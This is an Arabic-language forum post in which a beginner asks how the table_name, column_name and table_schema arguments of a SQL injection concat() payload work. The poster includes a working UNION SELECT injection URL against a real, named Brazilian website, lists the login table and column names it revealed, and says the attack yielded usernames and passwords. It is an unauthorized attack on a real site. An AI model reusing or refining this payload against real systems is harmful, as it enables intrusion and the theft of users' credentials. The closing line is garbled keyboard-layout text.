السلام عليكم ايها الاحبه
السموحه اذا ثقلنا عليكم بالاسأله واعذرونا لاننا مبتدئين ومنكم نتعلم
انا عندي عدم وضوح بالنسبه عند الوصول الى المرحلة النهائيه لحقن اي موقع
بمعنى اني احصل لا اعلم ماذا ادخل في هذا الامر
concat(table_name,0x3a,column_name,0x3a,table_sche ma)
ماذا ادخل في table_name
column_name
table_schema
والاحظ احيانا بان البعض يحذف table_schema
ويكتفي فقط بالامر
concat(table_name,0x3a,column_name,
ارجوا التوضيح لاني والله اوصل الى هذه المرحله لكن اتلخب اي واحد اليوزر واي واحد اسم الباس ووين اعوضهم وشوو هو التيبل سكيما
ارجوا التوضيح بارك الله فيكم
لوكم مني دعوة عن ظهر قلب
مثال قبل قليل استطعت ان احقن هذا الموقع:
http://www.valorcontabil.com.br/supernews/?noticia=15 UNION /*!SELECT*/ 1,2,3,4,/*!concat*/(ID,0x3a,pass),6,7+from+supernews_login-- -
وحصلت بالنهايه
supernews_login:pass:valorcon_supern
supernews_login:ID:valorcon_supern
ولم افهم ماذا اضع بدل table_name , column_name , schema_name
انا هنا حذفت السكيما وتلخبطت بس بالنهايه طلع عندي الباس واليوزر لكن لا اعلم هل الطريقه صحيحه اما لا؟
hv[,h h.hgm i`h hgyl,q hekhx hgprk